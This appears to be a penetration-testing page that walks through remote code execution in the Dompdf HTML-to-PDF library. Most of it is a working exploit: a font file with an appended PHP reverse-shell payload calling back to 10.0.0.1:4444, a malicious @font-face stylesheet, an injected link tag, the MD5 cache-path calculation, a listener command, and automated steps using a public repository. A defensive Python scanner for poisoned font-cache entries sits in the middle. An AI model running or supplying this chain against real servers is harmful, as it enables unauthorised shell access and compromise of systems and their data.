# Dompdf RCE

Dompdf is an HTML to PDF converter for PHP. Vulnerable versions can be abused for remote code execution or SSRF, because Dompdf fetches remote resources such as stylesheets and fonts while rendering.

### Exploitation <a href="#exploitation" id="exploitation"></a>

#### 1. Create Malicious Font <a href="#id-1-create-malicious-font" id="id-1-create-malicious-font"></a>

First, we need to prepare the malicious **`.ttf`** file.\
Find any **`.ttf`** file on the local system, copy it to the current directory, and change the extension from **`ttf`** to **`php`**, since the goal is to have the server execute it as a PHP script.

```shellscript
find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php
```

Then append the PHP payload to the end of the file (the TrueType header stays intact, so the file still parses as a font).

```php
...
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>
```

#### 2. Create Malicious CSS <a href="#id-2-create-malicious-css" id="id-2-create-malicious-css"></a>

Next, create a malicious CSS file (**“evil.css”**) whose `@font-face` rule loads the **“evil.php”** file created above.

```css
@font-face {
  font-family: 'evil';
  src: url('http://10.0.0.1:8000/evil.php');
  font-weight: 'normal';
  font-style: 'normal';
}
```

#### 3. Host PHP & CSS <a href="#id-3-host-php-css" id="id-3-host-php-css"></a>

Now we have the two files in the current working directory.

```shellscript
ls

evil.css evil.php
```

Start a web server to host them.

```shellscript
python3 -m http.server 8000
```

#### 4. Send Request <a href="#id-4-send-request" id="id-4-send-request"></a>

On the target website, send a request that gets the following HTML into the page Dompdf renders (here via a reflected `title` parameter).

```shellscript
https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:8000/evil.css'>
```

Dompdf fetches our “evil.php” and caches it as **`/dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php`**, where the hash is the MD5 of the font URL and the extension is taken from the URL.\
For example, **`/dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php`**.

To get the MD5 hash, calculate it with the following command.

```shellscript
echo -n http://10.0.0.1:8000/evil.php | md5sum

2cddaeb743b6aeb5638ac0ac93c4c9f6
```

Alternatively, use Python's hashlib module.

```shellscript
python3
```

```python
>>> import hashlib
>>> hashlib.md5("http://10.0.0.1:8000/evil.php".encode("UTF-8")).hexdigest()
'2cddaeb743b6aeb5638ac0ac93c4c9f6'
```

#### 5. Execute Malicious PHP via Cached File <a href="#id-5-execute-malicious-php-via-cached-file" id="id-5-execute-malicious-php-via-cached-file"></a>

Now that we know the cached file path, requesting it makes the server execute the PHP appended to the cached font.\
For a reverse shell, first start a listener locally.

```shellscript
nc -lvnp 4444
```

Now request the cached PHP file.

```shellscript
curl https://example.com/dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php
```

We get a shell in the local terminal.
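As an added defender-side example (not part of the original page or the dompdf project), the following script scans a Dompdf font cache directory for the artifacts this technique leaves behind: a cached remote font whose extension is not a font extension, a file without a TrueType/OpenType header, and PHP open tags embedded in font data. The cache naming pattern follows the scheme shown above; the directory layout and sample files are constructed assumptions.

```python
import os
import re
import tempfile

# Remote fonts are cached as <family>_<weight-or-style>_<md5 of the font URL>.<ext>;
# the extension comes from the URL, which is how a ".php" can end up in the cache.
CACHE_NAME_RE = re.compile(
    r"^(?P<family>[^_]+)_(?P<style>[^_]+)_(?P<md5>[0-9a-f]{32})\.(?P<ext>[A-Za-z0-9]+)$"
)
FONT_MAGIC = (b"\x00\x01\x00\x00", b"true", b"OTTO", b"ttcf")  # TrueType / OpenType / collection
PHP_MARKERS = (b"<?php", b"<?=")


def inspect_font_cache(font_dir):
    """Return (filename, reason) findings for suspicious remote-font cache entries."""
    findings = []
    for name in sorted(os.listdir(font_dir)):
        path = os.path.join(font_dir, name)
        m = CACHE_NAME_RE.match(name)
        if m is None or not os.path.isfile(path):
            continue  # bundled fonts and dompdf's own font_family cache file do not match
        with open(path, "rb") as fh:
            data = fh.read()
        if m.group("ext").lower() not in ("ttf", "otf", "ttc"):
            findings.append((name, "cached remote font has a non-font extension"))
        if data[:4] not in FONT_MAGIC:
            findings.append((name, "no TrueType/OpenType magic at offset 0"))
        if any(marker in data for marker in PHP_MARKERS):
            findings.append((name, "PHP open tag embedded in font data"))
    return findings


def demo():
    """Build a constructed cache directory (assumed layout) and inspect it."""
    font_dir = tempfile.mkdtemp()
    stub_ttf = b"\x00\x01\x00\x00" + b"\x00" * 64  # constructed: TrueType header plus padding
    samples = {
        "good_normal_" + "a" * 32 + ".ttf": stub_ttf,
        # constructed analogue of evil_normal_<md5>.php: valid font header with PHP appended
        "evil_normal_" + "b" * 32 + ".php": stub_ttf + b"<?php echo 'test'; ?>",
        "dompdf_font_family_cache.php": b"<?php return array(); ?>",  # legitimate dompdf file
    }
    for name, data in samples.items():
        with open(os.path.join(font_dir, name), "wb") as fh:
            fh.write(data)
    return inspect_font_cache(font_dir)
```

Run `inspect_font_cache()` against the real `dompdf/lib/fonts` directory (or the configured font cache) to flag entries that should be reviewed and removed; keeping remote resource fetching disabled prevents the cache from being populated from attacker-controlled URLs in the first place.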

### Exploitation (Automated) <a href="#exploitation-automatically" id="exploitation-automatically"></a>

The same steps are packaged in [the positive-security repository](https://github.com/positive-security/dompdf-rce).

```shellscript
git clone https://github.com/positive-security/dompdf-rce.git
cd dompdf-rce/exploit
```

Modify the CSS and PHP files for your situation; see the previous **"Exploitation"** section for the details of each file. Then serve the exploit directory with PHP's built-in web server.

```shellscript
php -S 0.0.0.0:9001
```

Then send the request.

```shellscript
https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:9001/exploit.css'>
```

### References <a href="#references" id="references"></a>

* [dompdf](https://github.com/dompdf/dompdf)
* [Optiv](https://www.optiv.com/insights/source-zero/blog/exploiting-rce-vulnerability-dompdf)
